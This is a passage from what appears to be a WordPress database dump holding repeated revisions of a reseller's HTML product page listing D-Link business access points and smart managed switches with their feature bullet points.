<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:33:31','2019-09-25 04:33:31','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3366,1,'2019-09-25 12:33:55','2019-09-25 04:33:55','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:33:55','2019-09-25 04:33:55','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3367,1,'2019-09-25 12:34:16','2019-09-25 04:34:16','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access 